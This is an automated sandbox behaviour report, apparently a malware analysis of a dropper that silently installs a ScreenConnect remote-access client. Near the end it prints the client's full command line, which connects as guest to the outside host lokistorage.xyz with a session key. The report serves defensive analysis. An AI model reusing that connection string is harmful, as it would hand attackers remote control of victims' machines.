                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeMemory allocated: 1AC0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeMemory allocated: 3680000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeMemory allocated: 1B60000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeMemory allocated: 6D50000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeMemory allocated: 6430000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeMemory allocated: 7D50000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeMemory allocated: 8D50000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeMemory allocated: 6D50000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeMemory allocated: 6D50000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeMemory allocated: 8FD0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeMemory allocated: 1510000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeMemory allocated: 1BB0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeMemory allocated: 1B00000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeMemory allocated: 990000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeMemory allocated: 1A2F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeMemory allocated: DB0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeMemory allocated: 1AA40000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9148.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI934C.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe TID: 7412Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe TID: 7896Thread sleep count: 41 > 30Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe TID: 8060Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.2689799825.0000000005190000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: 0.2.tmpzNIZ0YQ.exe.1c00000.0.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                              Source: 0.0.tmpzNIZ0YQ.exe.c363d4.2.raw.unpack, NativeLibrary.csReference to suspicious API methods: LoadLibrary(type, assemblyTypeHint)
                              Source: 0.2.tmpzNIZ0YQ.exe.5bf0000.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                              Source: 0.2.tmpzNIZ0YQ.exe.5bf0000.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                              Source: 0.2.tmpzNIZ0YQ.exe.5bf0000.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                              Source: 0.2.tmpzNIZ0YQ.exe.5bf0000.5.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"Jump to behavior
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (20ae101cef0f1acf)\screenconnect.clientservice.exe" "?e=access&y=guest&h=lokistorage.xyz&p=8041&s=f323c95d-8cdd-41df-ba61-316036d00b41&k=bgiaaackaabsu0exaagaaaeaaqchadx0vdcoypzw3rhl2%2fwsmdfp2rmcowlbz1ecggd2oi1gruiacwzcrkszxbywgdfgxdbyoegqdwtpmoqlg8jof4zkxvyt9zhvvqib5ire7%2frfo81g3%2b6hxkpjc0inqs%2bxruwq1z%2b6smxqscbb%2fykhdhw7ahbhyk65snb5ak02%2bpswsu904ncqii1vfx60s4cj8ilr9kifjwymgg0rdnakscv6gau5odsv8wz3cfurc2fznj8a0fkfb5xyik39fbiivzp4vyfarunnluqwccrm3hrkoohc9g96dlui6y4avh5vyzfnxeaixqvrlqzjtpadrhivwzf5sgoywqiok%2bc5&t=slawomirkowalski&c=pl&c=kuc&c=&c=&c=&c=&c=&c="
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1491349532.00000000000D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Progman
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1491349532.00000000000D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
